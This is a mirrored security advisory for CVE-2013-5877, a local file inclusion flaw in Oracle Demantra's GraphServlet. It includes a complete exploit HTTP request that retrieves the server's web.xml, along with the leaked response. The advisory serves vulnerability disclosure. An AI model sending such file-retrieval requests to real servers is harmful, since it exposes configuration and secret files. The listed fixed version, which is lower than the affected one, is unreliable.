Lucene search

K
packetstormOliver GruskovnjakPACKETSTORM:125482
HistoryMar 01, 2014 - 12:00 a.m.

Oracle Demantra 12.2.1 Arbitrary File Retrieval

2014-03-0100:00:00
Oliver Gruskovnjak
packetstormsecurity.com
33

0.884 High

EPSS

Percentile

98.7%

`Vulnerability title: Local File Inclusion in Oracle Demantra  
CVE: CVE-2013-5877  
Vendor: Oracle  
Product: Demantra  
Affected version: 12.2.1  
Fixed version: 10.1.1.2  
Reported by: Oliver Gruskovnjak  
  
Details:  
  
A Local File Include (LFI) vulnerability has been discovered in Oracle  
Demantra. The vulnerability occurs when a file from the target system is  
injected into a page on the attacked server page.  
  
The vulnerable page is:  
* /demantra/GraphServlet  
  
Exploit:  
  
Request:  
  
POST /demantra/GraphServlet HTTP/1.1  
Host: 192.168.14.171:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 46  
  
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml  
  
Response:  
  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
Pragma: No-cache  
Cache-Control: no-cache  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
Content-Type: image/png  
Content-Length: 44378  
Date: Fri, 02 Aug 2013 20:20:58 GMT  
  
<?xml version="1.0" encoding="UTF-8"?>  
  
<web-app  
id="WebApp_9" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"   
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"   
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee  
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">   
  
  
  
  
<!-- Important Notice -->  
<!--  
The order of elements in the web.xml is significant for some  
Application Server parsers like WebSphere. The expected order is  
examplified in the comments of this file. Each element section has a  
Start comment(***) and an End comment. Please make sure to add new  
elements in the appropriate section of the file delimited by the  
relevant comment.  
-->  
  
<!-- ***Icons Start -->  
<!-- ***Icons End -->  
-snip-  
  
  
  
Further details at:  
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/  
  
  
Copyright:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
  
Disclaimer:  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.  
`